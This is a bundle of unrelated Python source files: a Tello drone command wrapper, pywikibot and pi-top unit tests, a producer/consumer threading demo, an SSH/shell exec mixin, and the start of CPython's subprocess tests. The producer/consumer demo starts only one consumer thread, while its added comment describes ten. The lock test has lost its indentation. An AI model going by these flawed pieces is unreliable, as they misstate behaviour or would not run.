        * Detection must be enabled with the mon command before use
        * With only forward or only downward detection, the rate is 20 Hz; with both enabled, detection alternates at 10 Hz per direction"""
        self.send_command('mdirection {}'.format(mdir))
    def ap2sta(self, ssid: str, passwrd: str):
        """Switch the Tello to station mode and connect to an AP
        ssid: the Wi-Fi SSID to connect to
        passwrd: the Wi-Fi password to connect with"""
        self.send_command('ap {} {}'.format(ssid, passwrd))
    # Read commands
    def get_speed(self):
        """Get the current speed setting (cm/s), speed (10-100)"""
        self.send_command('speed?', True)
        return self.log[-1].get_response()
    def get_battery(self):
        """Get the remaining battery percentage x, x = (10-100)"""
        self.send_command('battery?', True)
        return self.log[-1].get_response()
    def get_time(self):
        """Get the motor running time (s)"""
        self.send_command('time?', True)
        return self.log[-1].get_response()
    def get_wifi(self):
        """Get the Wi-Fi signal-to-noise ratio"""
        self.send_command('wifi?', True)
        return self.log[-1].get_response()
    def get_sdk(self):
        """Get the drone SDK version xx (>=20)"""
        self.send_command('sdk?', True)
        return self.log[-1].get_response()
    def get_sn(self):
        """Get the drone SN (production serial number)"""
        self.send_command('sn?', True)
        return self.log[-1].get_response()
    def get_height(self):
        """Get the height; deprecated in newer versions"""
        self.send_command('height?', True)
        return self.log[-1].get_response()
    def get_temp(self):
        """Get the temperature; deprecated in newer versions"""
        self.send_command('temp?', True)
        return self.log[-1].get_response()
    def get_attitude(self):
        """Get the flight attitude; deprecated in newer versions"""
        self.send_command('attitude?', True)
        return self.log[-1].get_response()
    def get_baro(self):
        """Get the barometric pressure; deprecated in newer versions"""
        self.send_command('baro?', True)
        return self.log[-1].get_response()
    def get_acceleration(self):
        """Get the acceleration; deprecated in newer versions"""
        self.send_command('acceleration?', True)
        return self.log[-1].get_response()
    def get_tof(self):
        """Get the ToF (time-of-flight) reading; deprecated in newer versions"""
        self.send_command('tof?', True)
        return self.log[-1].get_response()
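# Usage sketch (added, not part of the original module); assumes a Tello
# reachable on its default Wi-Fi AP at 192.168.10.1.
if __name__ == '__main__':
    drone = Tello()  # __init__ already sends 'command' to enter SDK mode
    drone.takeoff()
    drone.forward(50)
    drone.cw(90)
    drone.land()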
|
test_lock.py | from sys import modules
from threading import Thread
from unittest import TestCase, skip
from unittest.mock import Mock, mock_open, patch
mock_os = modules["os"] = Mock()
mock_logger = modules["pitop.common.logger"] = Mock()
# import after applying mocks
from pitop.common.lock import PTLock # noqa: E402
@skip
class PTLockTestCase(TestCase):
__dummy_lock_id = "dummy"
lock_file_path = "/tmp/.com.pi-top.sdk.dummy.lock"
def tearDown(self):
mock_logger.reset_mock()
mock_os.reset_mock()
@patch("builtins.open", new_callable=mock_open())
def test_instance_opens_file(self, m):
_ = PTLock(self.__dummy_lock_id)
m.assert_called_with(self.lock_file_path, "w")
@patch("pitop.common.lock.exists", return_value=True)
def test_chmod_not_called_if_file_exist(self, exists_mock):
_ = PTLock(self.__dummy_lock_id)
exists_mock.assert_called_once_with(self.lock_file_path)
mock_os.chmod.assert_not_called()
@patch("pitop.common.lock.exists", return_value=False)
def test_chmod_is_called_if_file_doesnt_exist(self, exists_mock):
_ = PTLock(self.__dummy_lock_id)
exists_mock.assert_called_once_with(self.lock_file_path)
mock_os.chmod.assert_called_once_with(self.lock_file_path, 146)
def test_acquire_success(self):
lock = PTLock(self.__dummy_lock_id)
self.assertTrue(lock.acquire())
def test_acquire_an_already_acquired_lock_by_same_object_fails(self):
lock = PTLock(self.__dummy_lock_id)
self.assertTrue(lock.acquire())
self.assertFalse(lock.acquire())
def test_release_a_locked_lock_by_same_object_returns_true(self):
lock = PTLock(self.__dummy_lock_id)
self.assertTrue(lock.acquire())
self.assertTrue(lock.release())
def test_release_a_locked_lock_by_other_object_fails(self):
lock1 = PTLock(self.__dummy_lock_id)
self.assertTrue(lock1.acquire())
lock2 = PTLock(self.__dummy_lock_id)
self.assertFalse(lock2.release())
def test_release_an_unlocked_lock_returns_false(self):
lock = PTLock(self.__dummy_lock_id)
self.assertFalse(lock.release())
def test_acquire_locks_all_instances(self):
lock1 = PTLock(self.__dummy_lock_id)
lock2 = PTLock(self.__dummy_lock_id)
lock1.acquire()
for lock in (lock1, lock2):
self.assertTrue(lock.is_locked())
lock1.release()
def test_acquire_locks_thread_until_unlocked(self):
def acquire_lock(_lock: PTLock):
_lock.acquire()
lock = PTLock(self.__dummy_lock_id)
lock.acquire()
lock2 = PTLock(self.__dummy_lock_id)
thread = Thread(target=acquire_lock, args=[lock2])
thread.start()
self.assertTrue(thread.is_alive())
lock.release()
thread.join()
self.assertFalse(thread.is_alive())
def test_is_locked_method(self):
lock1 = PTLock(self.__dummy_lock_id)
lock2 = PTLock(self.__dummy_lock_id)
lock1.acquire()
for lock in (lock1, lock2):
self.assertTrue(lock.is_locked())
lock1.release()
for lock in (lock1, lock2):
self.assertFalse(lock.is_locked())
|
ui_tests.py | """Tests for the user interface."""
#
# (C) Pywikibot team, 2008-2021
#
# Distributed under the terms of the MIT license.
#
# NOTE FOR RUNNING WINDOWS UI TESTS
#
# Windows UI tests have to be run using the tests\ui_tests.bat helper script.
# This will set PYTHONPATH and PYWIKIBOT_DIR, and then run the tests. Do not
# touch mouse or keyboard while the tests are running, as this might disturb
# the interaction tests.
#
# The Windows tests were developed on a Dutch Windows 7 OS. You might need to
# adapt the helper functions in TestWindowsTerminalUnicode for other versions.
#
# For the Windows-based tests, you need the following packages installed:
# - pywin32, for clipboard access, which can be installed using:
# pip install -U pywin32
#
# - pywinauto, to send keys to the terminal, which can be installed using:
# pip install -U pywinauto
#
#
import inspect
import io
import logging
import os
import subprocess
import sys
import time
from contextlib import suppress
import pywikibot
from pywikibot.bot import (
ui, DEBUG, VERBOSE, INFO, STDOUT, INPUT, WARNING, ERROR, CRITICAL
)
from pywikibot.userinterfaces import (
terminal_interface_win32, terminal_interface_base, terminal_interface_unix,
)
from tests.aspects import TestCase, TestCaseBase
from tests.utils import unittest, FakeModule
if os.name == 'nt':
from multiprocessing.managers import BaseManager
import threading
try:
import win32api
except ImportError:
win32api = None
try:
import pywinauto
except ImportError:
pywinauto = None
try:
import win32clipboard
except ImportError:
win32clipboard = None
class Stream:
"""Handler for a StringIO or BytesIO instance able to patch itself."""
def __init__(self, name: str, patched_streams: dict):
"""
Create a new stream with a StringIO or BytesIO instance.
@param name: The part after 'std' (e.g. 'err').
@param patched_streams: A mapping which maps the original stream to
the patched stream.
"""
self._stream = io.StringIO()
self._name = 'std{0}'.format(name)
self._original = getattr(sys, self._name)
patched_streams[self._original] = self._stream
def __repr__(self):
return '<patched {} {!r} wrapping {!r}>'.format(
self._name, self._stream, self._original)
def reset(self):
"""Reset own stream."""
self._stream.truncate(0)
self._stream.seek(0)
if os.name == 'nt':
class pywikibotWrapper:
"""pywikibot wrapper class."""
def init(self):
pywikibot.version._get_program_dir()
def output(self, *args, **kwargs):
return pywikibot.output(*args, **kwargs)
def request_input(self, *args, **kwargs):
self.input = None
def threadedinput():
self.input = pywikibot.input(*args, **kwargs)
self.inputthread = threading.Thread(target=threadedinput)
self.inputthread.start()
def get_input(self):
self.inputthread.join()
return self.input
def set_config(self, key, value):
setattr(pywikibot.config, key, value)
def set_ui(self, key, value):
setattr(pywikibot.ui, key, value)
def cls(self):
subprocess.run('cls', shell=True)
class pywikibotManager(BaseManager):
"""pywikibot manager class."""
pass
pywikibotManager.register('pywikibot', pywikibotWrapper)
_manager = pywikibotManager(
address=('127.0.0.1', 47228),
authkey=b'4DJSchgwy5L5JxueZEWbxyeG')
if len(sys.argv) > 1 and sys.argv[1] == '--run-as-slave-interpreter':
s = _manager.get_server()
s.serve_forever()
def patched_print(text, target_stream):
try:
stream = patched_streams[target_stream]
except KeyError:
assert isinstance(target_stream,
pywikibot.userinterfaces.win32_unicode.UnicodeOutput)
assert target_stream._stream
stream = patched_streams[target_stream._stream]
org_print(text, stream)
def patched_input():
return strin._stream.readline().strip()
patched_streams = {}
strout = Stream('out', patched_streams)
strerr = Stream('err', patched_streams)
strin = Stream('in', {})
newstdout = strout._stream
newstderr = strerr._stream
newstdin = strin._stream
org_print = ui._print
org_input = ui._raw_input
def patch():
"""Patch standard terminal files."""
strout.reset()
strerr.reset()
strin.reset()
ui._print = patched_print
ui._raw_input = patched_input
def unpatch():
"""Un-patch standard terminal files."""
ui._print = org_print
ui._raw_input = org_input
logger = logging.getLogger('pywiki')
loggingcontext = {'caller_name': 'ui_tests',
'caller_file': 'ui_tests',
'caller_line': 0,
'newline': '\n'}
class UITestCase(TestCaseBase):
"""UI tests."""
net = False
def setUp(self):
super().setUp()
patch()
pywikibot.config.colorized_output = True
pywikibot.config.transliterate = False
pywikibot.ui.transliteration_target = None
pywikibot.ui.encoding = 'utf-8'
def tearDown(self):
super().tearDown()
unpatch()
class TestTerminalOutput(UITestCase):
"""Terminal output tests."""
tests = [
('debug', DEBUG, '', ''),
('verbose', VERBOSE, '', ''),
('info', INFO, '', 'info\n'),
('stdout', STDOUT, 'stdout\n', ''),
('input', INPUT, '', 'input\n'),
('WARNING', WARNING, '', 'WARNING: WARNING\n'),
('ERROR', ERROR, '', 'ERROR: ERROR\n'),
('CRITICAL', CRITICAL, '', 'CRITICAL: CRITICAL\n'),
]
def test_outputlevels_logging(self):
"""Test logger with output levels."""
for text, level, out, err in self.tests:
with self.subTest(test=text):
logger.log(level, text, extra=loggingcontext)
self.assertEqual(newstdout.getvalue(), out)
self.assertEqual(newstderr.getvalue(), err)
patch() # reset terminal files
def test_output(self):
pywikibot.output('output')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(newstderr.getvalue(), 'output\n')
def test_stdout(self):
pywikibot.stdout('output')
self.assertEqual(newstdout.getvalue(), 'output\n')
self.assertEqual(newstderr.getvalue(), '')
def test_warning(self):
pywikibot.warning('warning')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(newstderr.getvalue(), 'WARNING: warning\n')
def test_error(self):
pywikibot.error('error')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(newstderr.getvalue(), 'ERROR: error\n')
def test_log(self):
pywikibot.log('log')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(newstderr.getvalue(), '')
def test_critical(self):
pywikibot.critical('critical')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(newstderr.getvalue(), 'CRITICAL: critical\n')
def test_debug(self):
pywikibot.debug('debug', 'test')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(newstderr.getvalue(), '')
def test_exception(self):
class TestException(Exception):
"""Test exception."""
try:
raise TestException('Testing Exception')
except TestException:
pywikibot.exception('exception')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(newstderr.getvalue(),
'ERROR: TestException: Testing Exception\n')
def test_exception_tb(self):
class TestException(Exception):
"""Test exception."""
try:
raise TestException('Testing Exception')
except TestException:
pywikibot.exception('exception', tb=True)
self.assertEqual(newstdout.getvalue(), '')
stderrlines = newstderr.getvalue().split('\n')
self.assertEqual(stderrlines[0],
'ERROR: TestException: Testing Exception')
self.assertEqual(stderrlines[1], 'Traceback (most recent call last):')
self.assertEqual(stderrlines[3],
" raise TestException('Testing Exception')")
self.assertTrue(stderrlines[4].endswith(': Testing Exception'))
self.assertNotEqual(stderrlines[-1], '\n')
class TestTerminalInput(UITestCase):
"""Terminal input tests."""
input_choice_output = 'question ([A]nswer 1, a[n]swer 2, an[s]wer 3): '
def testInput(self):
newstdin.write('input to read\n')
newstdin.seek(0)
returned = pywikibot.input('question')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(newstderr.getvalue(), 'question: ')
self.assertIsInstance(returned, str)
self.assertEqual(returned, 'input to read')
def test_input_yn(self):
newstdin.write('\n')
newstdin.seek(0)
returned = pywikibot.input_yn('question', False, automatic_quit=False)
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(newstderr.getvalue(), 'question ([y]es, [N]o): ')
self.assertFalse(returned)
def _call_input_choice(self):
rv = pywikibot.input_choice(
'question',
(('answer 1', 'A'),
('answer 2', 'N'),
('answer 3', 'S')),
'A',
automatic_quit=False)
self.assertEqual(newstdout.getvalue(), '')
self.assertIsInstance(rv, str)
return rv
def testInputChoiceDefault(self):
newstdin.write('\n')
newstdin.seek(0)
returned = self._call_input_choice()
self.assertEqual(returned, 'a')
def testInputChoiceCapital(self):
newstdin.write('N\n')
newstdin.seek(0)
returned = self._call_input_choice()
self.assertEqual(newstderr.getvalue(), self.input_choice_output)
self.assertEqual(returned, 'n')
def testInputChoiceNonCapital(self):
newstdin.write('n\n')
newstdin.seek(0)
returned = self._call_input_choice()
self.assertEqual(newstderr.getvalue(), self.input_choice_output)
self.assertEqual(returned, 'n')
def testInputChoiceIncorrectAnswer(self):
newstdin.write('X\nN\n')
newstdin.seek(0)
returned = self._call_input_choice()
self.assertEqual(newstderr.getvalue(), self.input_choice_output * 2)
self.assertEqual(returned, 'n')
@unittest.skipUnless(os.name == 'posix', 'requires Unix console')
class TestTerminalOutputColorUnix(UITestCase):
"""Terminal output color tests."""
str1 = 'text \03{lightpurple}light purple text\03{default} text'
def testOutputColorizedText(self):
pywikibot.output(self.str1)
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(
newstderr.getvalue(),
'text \x1b[95mlight purple text\x1b[0m text\n')
def testOutputNoncolorizedText(self):
pywikibot.config.colorized_output = False
pywikibot.output(self.str1)
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(
newstderr.getvalue(),
'text light purple text text ***\n')
str2 = ('normal text \03{lightpurple} light purple '
'\03{lightblue} light blue \03{previous} light purple '
'\03{default} normal text')
def testOutputColorCascade_incorrect(self):
"""Test incorrect behavior of testOutputColorCascade."""
pywikibot.output(self.str2)
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(
newstderr.getvalue(),
'normal text \x1b[95m light purple '
'\x1b[94m light blue \x1b[95m light purple '
'\x1b[0m normal text\n')
@unittest.skipUnless(os.name == 'posix', 'requires Unix console')
class TestTerminalUnicodeUnix(UITestCase):
"""Terminal output tests for unix."""
def testOutputUnicodeText(self):
pywikibot.output('Заглавная_страница')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(newstderr.getvalue(), 'Заглавная_страница\n')
def testInputUnicodeText(self):
newstdin.write('Заглавная_страница\n')
newstdin.seek(0)
returned = pywikibot.input('Википедию? ')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(
newstderr.getvalue(), 'Википедию? ')
self.assertIsInstance(returned, str)
self.assertEqual(returned, 'Заглавная_страница')
@unittest.skipUnless(os.name == 'posix', 'requires Unix console')
class TestTransliterationUnix(UITestCase):
"""Terminal output transliteration tests."""
def testOutputTransliteratedUnicodeText(self):
pywikibot.ui.encoding = 'latin-1'
pywikibot.config.transliterate = True
pywikibot.output('abcd АБГД αβγδ あいうえお')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(
newstderr.getvalue(),
'abcd \x1b[93mA\x1b[0m\x1b[93mB\x1b[0m\x1b[93mG\x1b[0m'
'\x1b[93mD\x1b[0m \x1b[93ma\x1b[0m\x1b[93mb\x1b[0m\x1b[93mg'
'\x1b[0m\x1b[93md\x1b[0m \x1b[93ma\x1b[0m\x1b[93mi\x1b[0m'
'\x1b[93mu\x1b[0m\x1b[93me\x1b[0m\x1b[93mo\x1b[0m\n')
@unittest.skipUnless(os.name == 'nt', 'requires Windows console')
class WindowsTerminalTestCase(UITestCase):
"""MS Windows terminal tests."""
@classmethod
def setUpClass(cls):
if os.name != 'nt':
raise unittest.SkipTest('requires Windows console')
if not win32api:
raise unittest.SkipTest('requires Windows package pywin32')
if not win32clipboard:
raise unittest.SkipTest('requires Windows package win32clipboard')
if not pywinauto:
raise unittest.SkipTest('requires Windows package pywinauto')
try:
# pywinauto 0.5.0
cls._app = pywinauto.Application()
except AttributeError as e1:
try:
cls._app = pywinauto.application.Application()
except AttributeError as e2:
raise unittest.SkipTest('pywinauto Application failed: {}\n{}'
.format(e1, e2))
super().setUpClass()
@classmethod
def setUpProcess(cls, command):
si = subprocess.STARTUPINFO()
si.dwFlags = subprocess.STARTF_USESTDHANDLES
cls._process = subprocess.Popen(
command, creationflags=subprocess.CREATE_NEW_CONSOLE)
cls._app.connect_(process=cls._process.pid)
# set truetype font (Lucida Console, hopefully)
try:
window = cls._app.window_()
except Exception as e:
cls.tearDownProcess()
raise unittest.SkipTest(
'Windows package pywinauto could not locate window: {!r}'
.format(e))
try:
window.TypeKeys('% {UP}{ENTER}%L{HOME}L{ENTER}', with_spaces=True)
except Exception as e:
cls.tearDownProcess()
raise unittest.SkipTest(
'Windows package pywinauto could not use window TypeKeys: {!r}'
.format(e))
@classmethod
def tearDownProcess(cls):
cls._process.kill()
def setUp(self):
super().setUp()
self.setclip('')
def waitForWindow(self):
while not self._app.window_().IsEnabled():
time.sleep(0.01)
def getstdouterr(self):
sentinel = '~~~~SENTINEL~~~~cedcfc9f-7eed-44e2-a176-d8c73136c185'
        # preload the clipboard with the sentinel, then select all and copy
        self.setclip(sentinel)
self._app.window_().SetFocus()
self.waitForWindow()
self._app.window_().TypeKeys(
'% {UP}{UP}{UP}{RIGHT}{DOWN}{DOWN}{DOWN}{ENTER}{ENTER}',
with_spaces=True)
while True:
data = self.getclip()
if data != sentinel:
return data
time.sleep(0.01)
def setclip(self, text):
win32clipboard.OpenClipboard()
win32clipboard.SetClipboardData(win32clipboard.CF_UNICODETEXT, text)
win32clipboard.CloseClipboard()
def getclip(self):
win32clipboard.OpenClipboard()
data = win32clipboard.GetClipboardData(win32clipboard.CF_UNICODETEXT)
win32clipboard.CloseClipboard()
data = data.split('\x00')[0]
data = data.replace('\r\n', '\n')
return data
def sendstdin(self, text):
self.setclip(text.replace('\n', '\r\n'))
self._app.window_().SetFocus()
self.waitForWindow()
self._app.window_().TypeKeys(
'% {UP}{UP}{UP}{RIGHT}{DOWN}{DOWN}{ENTER}',
with_spaces=True)
class TestWindowsTerminalUnicode(WindowsTerminalTestCase):
"""MS Windows terminal unicode tests."""
@classmethod
def setUpClass(cls):
super().setUpClass()
fn = inspect.getfile(inspect.currentframe())
cls.setUpProcess(['python', 'pwb.py', fn,
'--run-as-slave-interpreter'])
_manager.connect()
cls.pywikibot = _manager.pywikibot()
@classmethod
def tearDownClass(cls):
del cls.pywikibot
cls.tearDownProcess()
def setUp(self):
super().setUp()
self.pywikibot.set_config('colorized_output', True)
self.pywikibot.set_config('transliterate', False)
self.pywikibot.set_config('console_encoding', 'utf-8')
self.pywikibot.set_ui('transliteration_target', None)
self.pywikibot.set_ui('encoding', 'utf-8')
self.pywikibot.cls()
def testOutputUnicodeText_no_transliterate(self):
self.pywikibot.output('Заглавная_страница')
self.assertEqual(self.getstdouterr(), 'Заглавная_страница\n')
def testOutputUnicodeText_transliterate(self):
self.pywikibot.set_config('transliterate', True)
self.pywikibot.set_ui('transliteration_target', 'latin-1')
self.pywikibot.output('Заглавная_страница')
self.assertEqual(self.getstdouterr(), 'Zaglavnaya_stranica\n')
def testInputUnicodeText(self):
self.pywikibot.set_config('transliterate', True)
self.pywikibot.request_input('Википедию? ')
self.assertEqual(self.getstdouterr(), 'Википедию?')
self.sendstdin('Заглавная_страница\n')
returned = self.pywikibot.get_input()
self.assertEqual(returned, 'Заглавная_страница')
class TestWindowsTerminalUnicodeArguments(WindowsTerminalTestCase):
"""MS Windows terminal unicode argument tests."""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.setUpProcess(['cmd', '/k', 'echo off'])
@classmethod
def tearDownClass(cls):
cls.tearDownProcess()
def testOutputUnicodeText_no_transliterate(self):
self.sendstdin(
'python -c \"'
'import subprocess, pywikibot; '
"subprocess.run('cls', shell=True); "
"pywikibot.output('\\n'.join(pywikibot.handle_args()))\" "
'Alpha Bετα Гамма دلتا\n')
lines = []
for i in range(3):
lines = self.getstdouterr().split('\n')
            if len(lines) >= 4 and 'Alpha' in lines:
# if len(lines) < 4, we assume not all lines had been output
# yet, and retry. We check at least one of the lines contains
# "Alpha" to prevent using older clipboard content. We limit
# the number of retries to 3 so that the test will finish even
# if neither of these requirements are met.
break
time.sleep(1)
# empty line is the new command line
self.assertEqual(lines, ['Alpha', 'Bετα', 'Гамма', 'دلتا', ''])
# TODO: add tests for background colors.
class FakeUITest(TestCase):
"""Test case to allow doing uncolorized general UI tests."""
net = False
expected = 'Hello world you! ***'
expect_color = False
ui_class = terminal_interface_base.UI
def setUp(self):
"""Create dummy instances for the test and patch encounter_color."""
super().setUp()
self.stream = io.StringIO()
self.ui_obj = self.ui_class()
self._orig_encounter_color = self.ui_obj.encounter_color
self.ui_obj.encounter_color = self._encounter_color
self._index = 0
def tearDown(self):
"""Unpatch the encounter_color method."""
self.ui_obj.encounter_color = self._orig_encounter_color
super().tearDown()
self.assertEqual(self._index,
len(self._colors) if self.expect_color else 0)
def _getvalue(self):
"""Get the value of the stream."""
return self.stream.getvalue()
def _encounter_color(self, color, target_stream):
"""Patched encounter_color method."""
raise AssertionError('This method should not be invoked')
def test_no_color(self):
"""Test a string without any colors."""
self._colors = ()
self.ui_obj._print('Hello world you!', self.stream)
self.assertEqual(self._getvalue(), 'Hello world you!')
def test_one_color(self):
"""Test a string using one color."""
self._colors = (('red', 6), ('default', 10))
self.ui_obj._print('Hello \03{red}world you!', self.stream)
self.assertEqual(self._getvalue(), self.expected)
def test_flat_color(self):
"""Test using colors with defaulting in between."""
self._colors = (('red', 6), ('default', 6), ('yellow', 3),
('default', 1))
self.ui_obj._print('Hello \03{red}world \03{default}you\03{yellow}!',
self.stream)
self.assertEqual(self._getvalue(), self.expected)
def test_stack_with_pop_color(self):
"""Test using stacked colors and just popping the latest color."""
self._colors = (('red', 6), ('yellow', 6), ('red', 3), ('default', 1))
self.ui_obj._print('Hello \03{red}world \03{yellow}you\03{previous}!',
self.stream)
self.assertEqual(self._getvalue(), self.expected)
def test_stack_implicit_color(self):
"""Test using stacked colors without popping any."""
self._colors = (('red', 6), ('yellow', 6), ('default', 4))
self.ui_obj._print('Hello \03{red}world \03{yellow}you!', self.stream)
self.assertEqual(self._getvalue(), self.expected)
def test_one_color_newline(self):
"""Test with trailing new line and one color."""
self._colors = (('red', 6), ('default', 11))
self.ui_obj._print('Hello \03{red}world you!\n', self.stream)
self.assertEqual(self._getvalue(), self.expected + '\n')
class FakeUIColorizedTestBase(TestCase):
"""Base class for test cases requiring that colorized output is active."""
expect_color = True
def setUp(self):
"""Force colorized_output to True."""
super().setUp()
self._old_config = pywikibot.config2.colorized_output
pywikibot.config2.colorized_output = True
def tearDown(self):
"""Undo colorized_output configuration."""
pywikibot.config2.colorized_output = self._old_config
super().tearDown()
class FakeUnixTest(FakeUIColorizedTestBase, FakeUITest):
"""Test case to allow doing colorized Unix tests in any environment."""
net = False
expected = 'Hello world you!'
ui_class = terminal_interface_unix.UnixUI
def _encounter_color(self, color, target_stream):
"""Verify that the written data, color and stream are correct."""
self.assertIs(target_stream, self.stream)
expected_color = self._colors[self._index][0]
self._index += 1
self.assertEqual(color, expected_color)
self.assertLength(self.stream.getvalue(),
sum(e[1] for e in self._colors[:self._index]))
class FakeWin32Test(FakeUIColorizedTestBase, FakeUITest):
"""
Test case to allow doing colorized Win32 tests in any environment.
This only patches the ctypes import in the terminal_interface_win32
module. As the Win32CtypesUI is using the std-streams from another
import these will be unpatched.
"""
net = False
expected = 'Hello world you!'
ui_class = terminal_interface_win32.Win32UI
def setUp(self):
"""Patch the ctypes import and initialize a stream and UI instance."""
super().setUp()
self._orig_ctypes = terminal_interface_win32.ctypes
ctypes = FakeModule.create_dotted('ctypes.windll.kernel32')
ctypes.windll.kernel32.SetConsoleTextAttribute = self._handle_setattr
terminal_interface_win32.ctypes = ctypes
self.stream._hConsole = object()
def tearDown(self):
"""Unpatch the ctypes import and check that all colors were used."""
terminal_interface_win32.ctypes = self._orig_ctypes
super().tearDown()
def _encounter_color(self, color, target_stream):
"""Call the original method."""
self._orig_encounter_color(color, target_stream)
def _handle_setattr(self, handle, attribute):
"""Dummy method to handle SetConsoleTextAttribute."""
self.assertIs(handle, self.stream._hConsole)
color = self._colors[self._index][0]
self._index += 1
color = terminal_interface_win32.windowsColors[color]
self.assertEqual(attribute, color)
self.assertLength(self.stream.getvalue(),
sum(e[1] for e in self._colors[:self._index]))
class FakeWin32UncolorizedTest(FakeWin32Test):
"""Test case to allow doing uncolorized Win32 tests in any environment."""
net = False
expected = 'Hello world you! ***'
expect_color = False
def setUp(self):
"""Change the local stream's console to None to disable colors."""
super().setUp()
self.stream._hConsole = None
if __name__ == '__main__': # pragma: no cover
try:
with suppress(SystemExit):
unittest.main()
finally:
unpatch()
|
productor_customer.py | __author__ = 'Aaron Yang'
__email__ = 'byang971@usc.edu'
__date__ = '7/24/2020 10:29 PM'
import time
import queue
import threading
q = queue.Queue(10)  # Create a queue that holds the "baozi" (steamed buns), max size 10
def productor(i):
    # The chef keeps making one bun every 2 seconds
    while True:
        q.put("Bun made by chef %s!" % i)
        time.sleep(2)
def consumer(j):
    # The customer keeps eating one bun every second
    while True:
        print("Customer %s ate one: %s" % (j, q.get()))
        time.sleep(1)
# Instantiate 3 producers (chefs)
for i in range(3):
    t = threading.Thread(target=productor, args=(i,))
    t.start()
# Instantiate 10 consumers (customers)
for j in range(10):
    v = threading.Thread(target=consumer, args=(j,))
v.start()
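# Note (added): the producers make 3 buns every 2 s (1.5/s) while the 10
# consumers each call q.get() once per second, so consumers spend most of
# their time blocked in q.get(); the Queue(10) bound would only throttle
# producers via a blocking q.put() if production ever outpaced consumption.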
|
exec.py | from utility import ssh, shell
import threading
class ExecMixin(object):
def sh(self, command_args, input = None, display = True, line_prefix = '', env = None, cwd = None, sudo = False):
if not env:
env = {}
return shell.Shell.exec(command_args,
input = input,
display = display,
line_prefix = line_prefix,
env = env,
cwd = cwd,
callback = self._sh_callback,
sudo = sudo
)
def _sh_callback(self, process, line_prefix, display = True):
def stream_stdout():
for line in process.stdout:
line = line.decode('utf-8').strip('\n')
if display:
self.info("{}{}".format(line_prefix, line))
def stream_stderr():
for line in process.stderr:
line = line.decode('utf-8').strip('\n')
if not line.startswith('[sudo]'):
self.warning("{}{}".format(line_prefix, line))
thrd_out = threading.Thread(target = stream_stdout)
thrd_out.start()
thrd_err = threading.Thread(target = stream_stderr)
thrd_err.start()
thrd_out.join()
thrd_err.join()
def ssh(self, hostname, username, password = None, key = None, timeout = 10, port = 22, env = None):
if not env:
            env = {}
        conn = None  # stays None if the connection attempt below fails
        try:
conn = ssh.SSH(hostname, username, password,
key = key,
callback = self._ssh_callback,
timeout = timeout,
port = port,
env = env
)
conn.wrap_exec(self._ssh_exec)
conn.wrap_file(self._ssh_file)
except Exception as e:
self.error("SSH connection to {} failed: {}".format(hostname, e))
return conn
def _ssh_exec(self, ssh, executer, command, args, options):
id_prefix = "[{}]".format(ssh.hostname)
try:
return executer(command, args, options)
except Exception as e:
self.error("SSH {} execution failed: {}".format(command, e), prefix = id_prefix)
def _ssh_file(self, ssh, executer, callback, *args):
id_prefix = "[{}]".format(ssh.hostname)
try:
executer(callback, *args)
except Exception as e:
self.error("SFTP transfer failed: {}".format(e), prefix = id_prefix)
def _ssh_callback(self, ssh, stdin, stdout, stderr):
id_prefix = "[{}]".format(ssh.hostname)
def stream_stdout():
for line in stdout:
self.info(line.strip('\n'), prefix = id_prefix)
def stream_stderr():
for line in stderr:
if not line.startswith('[sudo]'):
self.warning(line.strip('\n'), prefix = id_prefix)
thrd_out = threading.Thread(target = stream_stdout)
thrd_out.start()
thrd_err = threading.Thread(target = stream_stderr)
thrd_err.start()
thrd_out.join()
thrd_err.join()
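# Usage sketch (added): the mixin assumes the host class provides
# info/warning/error logging methods, e.g.:
#
# class Runner(ExecMixin):
#     def info(self, msg, prefix=''):
#         print(prefix + msg)
#     def warning(self, msg, prefix=''):
#         print('WARN', prefix + msg)
#     def error(self, msg, prefix=''):
#         print('ERROR', prefix + msg)
#
# Runner().sh(['echo', 'hello'])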
|
test_subprocess.py | import unittest
from unittest import mock
from test import support
import subprocess
import sys
import signal
import io
import itertools
import os
import errno
import tempfile
import time
import traceback
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
import json
from test.support import FakePath
try:
import _testcapi
except ImportError:
_testcapi = None
try:
import pwd
except ImportError:
pwd = None
try:
import grp
except ImportError:
grp = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
ZERO_RETURN_CMD = (sys.executable, '-c', 'pass')
def setUpModule():
shell_true = shutil.which('true')
if shell_true is None:
return
if (os.access(shell_true, os.X_OK) and
subprocess.run([shell_true]).returncode == 0):
global ZERO_RETURN_CMD
ZERO_RETURN_CMD = (shell_true,) # Faster than Python startup.
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
if not mswindows:
# subprocess._active is not used on Windows and is set to None.
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(
subprocess._active, "subprocess._active not empty"
)
self.doCleanups()
support.reap_children()
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
